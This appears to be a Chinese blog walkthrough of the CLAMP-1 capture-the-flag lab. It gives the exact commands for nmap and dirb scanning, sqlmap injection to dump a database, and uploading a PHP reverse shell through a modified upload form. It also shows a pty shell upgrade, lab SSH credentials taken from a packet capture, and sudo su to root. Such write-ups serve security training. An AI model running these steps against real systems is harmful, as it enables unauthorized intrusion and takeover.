当前位置: 首页 > news >正文

CLAMP-1

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.173 -p- -A

3、目录扫描

dirb http://192.168.236.173

二、漏洞探测

访问80端口

访问 /nt4stopc/

下面有一些问题,提示必须收集答案

都是一些判断题,对与错对应1与0,最后结果为

0110111001

拼接访问

点击图中位置,发现url中存在参数,可能存在注入

直接用sqlmap跑一下

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch

库名

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

tatil 库下的表名

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables

gereksiz 表下得到一串值

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --dumphihijrijrijr-balrgralrijr-htjrzhujrz-bfnf  folder upload.php

解码

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径,拼接访问

再拼接 /upload.php

文件上传,以md5提交,但是没有提交按钮,自己在前端加一个

<input type="submit">

三、GetShell

kali 反弹shell

locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php

上传该文件后,返回了文件路径,文件名为md5加密后的

osas/2ad6bded962b884337eaeb921d7c2764.php

浏览器访问,kali 成功反弹到shell

http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

四、提权

使用python提高交互性

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng

查看文件内容,发现

email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

url解码,得到以下数据

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

账号密码

mkelepce:mklpc-osas112.

ssh连接

ssh mkelepce@192.168.236.173

查看具有root权限的命令

sudo -l

显示为 all ,直接 sudo su 提权,提权成功

sudo su

查看flag

相关文章:

CLAMP-1

一、信息收集 1、主机发现 nmap 192.168.236.0/24 2、端口扫描 nmap 192.168.236.173 -p- -A 3、目录扫描 dirb http://192.168.236.173 二、漏洞探测 访问80端口 访问 /nt4stopc/ 下面有一些问题&#xff0c;提示必须收集答案 都是一些判断题&#xff0c;对与错对应1与0&…...

Blender的Python编程介绍

在Blender这个免费的开源3D设计软件中&#xff0c;最值得称道的一点是可以用Python程序来辅助进行3D设计&#xff0c;我们可以通过Python来调整物体的属性&#xff0c;生成新的物体&#xff0c;甚至生成新的动画等等。 在最近的一个项目中&#xff0c;我用Blender制作了一个动…...

树莓派4/5:运行Yolov5n模型(文末附镜像文件)

〇、前言 因国内网络问题&#xff0c;可直接烧录文末镜像文件&#xff0c;或者按照本教程进行手动操作。 一、实验目的 在树莓派4B运行Yolov5n模型。 二、实验条件 1、Windows 11计算机&#xff1a;安装了Mobaxterm 2、树莓派4B&#xff1a;64Bit Lite OS&#xff0c;安装了…...

【学习笔记】Day 9

一、进度概述 1、inversionnet_train 试运行——成功 二、详情 1、inversionnet_train 试运行 在经历了昨天的事故后&#xff0c;今天最终成功运行了 inversionnet_train&#xff0c;运行结果如下&#xff1a; 经观察&#xff0c;最开始 loss 值大概为 0.5 左右 随着训练量的增…...

Linux网络案例

网络配置基础 WIN10上安装虚拟机&#xff0c;虚拟机里安装CENTOS6.5。 1&#xff09;网络配置的步骤 &#xff08;1&#xff09;CENTOS6.5C网络设置: su root //切换root用户 cd /etc/sysconfig/network-scripts //进入网卡配置文件所在目录 vi ifcfg-eth0 //修改网卡配置文件 …...

苹果离线打包机配置和打包

1、虚拟机安装 macOS虚拟机安装全过程&#xff08;VMware&#xff09;-腾讯云开发者社区-腾讯云 给 windows 虚拟机装个 mac 雪之梦 1、安装苹果镜像 去网上下载&#xff0c;打包机的镜像要和自己mac电脑上的保持一致。 同时打包机的用户名也需要和自己的mac保持一致。 2、…...

【C++ Primer Plus】学习笔记 5【指针 下】

文章目录 前言一、指针1.使用new创建动态结构例子&#xff1a;使用new和delete 2.自动存储、静态存储和动态存储1.自动存储2.静态存储3.动态存储 总结 前言 依旧是指针部分ヾ(◍∇◍)&#xff89;&#xff9e; 一、指针 1.使用new创建动态结构 将new用于结构由两步组成:创建…...

Phpstorm实现本地SSH开发远程机器(或虚拟机)项目

适用场景&#xff1a; 1、windows系统想要运行仅支持linux、mac系统的项目&#xff0c;可将项目运行在本地虚拟机&#xff0c;但是在虚拟机里使用vim编辑很麻烦&#xff0c;如何实现在本地用Phpstorm来编辑虚拟机中的代码&#xff1f; 下面的说明都是以本地虚拟机为例&#xff…...

API 的多分支管理,让 Apifox 帮你轻松搞定!

在产品迭代的过程中&#xff0c;对 API 的更新和维护是必然的&#xff0c;也是至关重要的。当产品需要引入新功能或对现有功能进行调整时&#xff0c;相应的 API 往往也需要进行升级或修改&#xff0c;这种情况在快速迭代的产品中很是常见。 然而&#xff0c;API 的迭代更新并非…...

线上预约陪诊平台医院陪诊系统源码就医陪护小程序APP开发

项目分析 随着医疗行业的数字化转型和人们对健康需求的日益增长&#xff0c;线上预约陪诊系统作为一种新兴的医疗服务模式&#xff0c;正逐渐受到市场的关注和认可。本文将从市场前景、使用人群、盈利模式以及竞品分析等多个角度&#xff0c;全面探讨线上预约陪诊系统的技术性…...

240806-在Linux/RHEL开机中自动启动bash脚本

A. 常规方法 要在Red Hat Enterprise Linux (RHEL) 中设置开机启动的bash脚本&#xff0c;可以使用以下方法之一&#xff1a; 方法1&#xff1a;使用/etc/rc.d/rc.local 打开/etc/rc.d/rc.local文件&#xff1a; sudo vi /etc/rc.d/rc.local在文件末尾添加你想要执行的bash脚…...

【多线程】乐观/悲观锁、重量级/轻量级锁、挂起等待/自旋锁、公平/非公锁、可重入/不可重入锁、读写锁

文章目录 乐观锁和悲观锁重量级锁和轻量级锁挂起等待锁和自旋锁公平锁和非公平锁可重入锁和不可重入锁读写锁相关面试题 锁&#xff1a;非常广义的概念&#xff0c;不是指某个具体的锁&#xff0c;所有的锁都可以往这些策略中套 synchronized&#xff1a;只是市面上五花八门的锁…...

31_逻辑漏洞、水平垂直越权、垂直越权漏洞测试、水平越权

概述 如果使用A用户的权限去操作B用户的数据&#xff0c;A的权限小于B的权限&#xff0c;如果能够成功操作&#xff0c;则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面&#xff08;需要登录的页面&#xff0…...

css写一个按钮流光动画效果

规则说明 按钮实现一个简易的流光动画 streamer.css.pay_button{width: 281*2px;height: 104px;border-radius: 80px;color: rgba(255, 255, 255, 1);background: linear-gradient(90deg, #FFA023 0%, #FF2B87 100%);margin-bottom: 20px;font-size: 32px;position: relative;o…...

AxMath保姆级安装教程(word联用)及使用TIPS

一、软件介绍 AxMath是一款数学公式编辑器软件。它提供了一个直观的界面&#xff0c;使用户可以轻松创建和编辑数学公式。AxMath支持多种数学符号、方程式、函数、矩阵等的输入和编辑&#xff0c;并提供了丰富的数学符号库和模板&#xff0c;方便用户快速创建复杂的数学公式。…...

Vue-03.指令-v-on

v-on 为HTML标签绑定事件 代码演示&#xff1a; 在下面的代码中&#xff0c;在input标签中定义了一个按钮&#xff0c;并且使用v-on为input标签绑定了一个事件click&#xff0c;当鼠标点击该按钮时&#xff0c;会触发指定的方法handle&#xff0c;如果…...

接口基础知识6:详解http request body(一篇讲完常见请求体)

课程大纲 一、定义 HTTP请求体&#xff08;HTTP Request body&#xff09;&#xff1a;HTTP请求消息的可选部分&#xff0c;仅在请求方法支持且需要发送数据时使用。 POST方法、PUT方法有请求体&#xff0c;GET和HEAD方法没有请求体。 请求头和请求体之间会有一个空行&#…...

Windows Server 安装Web,DHCP,DNS,FTP四大服务及其配置和监控方式

以Windows Server 2022为例 1.安装Web服务 添加角色->Web服务器勾选 添加Web服务器后会有一个interpub文件夹&#xff0c;其中wwwroot为网站根目录 工具->IIS->网站 ,这里可以将风险服务停掉 2.安装DHCP服务 添加角色->DHCP服务器勾选 右击IPv4->新建作用域 …...

创意指南丨VR游览沉浸式空间体验

欢迎来到我们制作的VR幻想世界。玩家的起点是一条蓝色水晶大道&#xff0c;让我们一起探索这个如梦似幻的境地。 在这条大道的两侧&#xff0c;漂浮着半透明的大水晶水母。它们轻盈地在空中飘动&#xff0c;仿佛在欢迎我们的到来。这条道路上方&#xff0c;一个个半圆环不停地…...

【iOS】—— autoreleasePool以及总结

【iOS】—— autoreleasePool以及总结 1. 什么是autoreleasePool2. autoreleasePoolPageobjc_autoreleasePoolPush方法&#xff1a;objc_autoreleasePoolPop方法&#xff1a;tokenkill()方法 3. 总结3.1 autoreleasePool的原理3.2 autoreleasePool的问题3.2.1 autoreleasepool的…...

obsidian-skills投资者管理:高效管理投资者关系的终极指南

obsidian-skills投资者管理&#xff1a;高效管理投资者关系的终极指南 【免费下载链接】obsidian-skills Agent skills for Obsidian. Teach your agent to use Markdown, Bases, JSON Canvas, and use the CLI. 项目地址: https://gitcode.com/GitHub_Trending/ob/obsidian-…...

如何实现Vuetify与GraphQL Code Generator的完美结合:终极类型安全数据获取指南

如何实现Vuetify与GraphQL Code Generator的完美结合&#xff1a;终极类型安全数据获取指南 【免费下载链接】vuetify &#x1f409; Vue Component Framework 项目地址: https://gitcode.com/gh_mirrors/vu/vuetify 在现代Web开发中&#xff0c;Vuetify组件框架与Graph…...

利用快马ai快速原型ventoy图形化工具,三步制作多系统启动u盘

利用快马AI快速原型Ventoy图形化工具&#xff0c;三步制作多系统启动U盘 最近在折腾多系统启动盘&#xff0c;发现Ventoy这个开源工具确实好用——直接把ISO镜像扔进U盘就能启动&#xff0c;再也不用反复格式化。但命令行操作对新手不太友好&#xff0c;于是想做个图形化工具。…...

SpringAI与DeepSeek集成:兼容OpenAI API的流式对话实践

1. 环境准备与基础配置 在开始集成SpringAI与DeepSeek之前&#xff0c;我们需要确保开发环境满足以下要求&#xff1a; JDK 17或更高版本&#xff1a;Spring Boot 3.x系列需要JDK 17作为最低版本支持Spring Boot 3.4.2&#xff1a;这是当前推荐的稳定版本Maven或Gradle&#xf…...

(技术解析)TabDDPM:如何用扩散模型攻克表格数据生成的异构性难题?

1. 扩散模型为何成为生成建模的新宠&#xff1f; 我第一次接触扩散模型是在2021年&#xff0c;当时正在为一个医疗数据分析项目寻找更好的数据增强方案。传统GAN生成的血压、血糖等生理指标数据总会出现数值断层&#xff0c;而VAE生成的年龄分布又常常偏离真实情况。直到尝试了…...

AI辅助开发:让快马AI成为你的编程搭档,迭代优化openclaw风格代码

今天想和大家分享一个开发小技巧&#xff1a;如何用AI辅助工具快速迭代优化代码。最近我在做一个数据抓取的小项目&#xff0c;需要实现类似openclaw的功能&#xff0c;正好用InsCode(快马)平台的AI功能试了试&#xff0c;效果出乎意料的好。 基础功能实现 最开始我只需要一个简…...

ai辅助qt性能优化:让快马平台帮你设计多线程数据可视化方案

最近在开发一个Qt实时数据可视化应用时&#xff0c;遇到了主界面卡顿的问题。经过分析发现&#xff0c;数据采集和处理操作直接在主线程执行&#xff0c;导致UI响应延迟。通过InsCode(快马)平台的AI辅助功能&#xff0c;我快速获得了一个多线程优化方案&#xff0c;效果显著。这…...

前端 SEO 优化与图片 SEO 优化的关系是什么_如何利用前端框架进行 SEO 优化

前端 SEO 优化与图片 SEO 优化的关系是什么&#xff1f; 在当今的互联网时代&#xff0c;搜索引擎优化&#xff08;SEO&#xff09;已经成为了任何网站想要获得高流量的关键步骤。前端 SEO 优化与图片 SEO 优化在这其中扮演着至关重要的角色。尽管它们看起来独立存在&#xff…...

Vue-Touch实战案例:构建支持多点触控的图片查看器

Vue-Touch实战案例&#xff1a;构建支持多点触控的图片查看器 【免费下载链接】vue-touch Hammer.js wrapper for Vue.js 项目地址: https://gitcode.com/gh_mirrors/vu/vue-touch 想要为你的Vue.js应用添加流畅的多点触控交互体验吗&#xff1f;Vue-Touch插件正是你需要…...

从FLOPS到TOPS:深入解析算力单位及其在AI芯片中的应用

1. 算力单位&#xff1a;从FLOPS到TOPS的进化史 第一次接触FLOPS这个术语时&#xff0c;我正试图比较两款显卡的性能。当时完全被各种"FLOP"搞晕了头&#xff0c;直到后来在实际项目中调试AI模型时&#xff0c;才真正理解了这些算力单位背后的意义。FLOPS&#xff0…...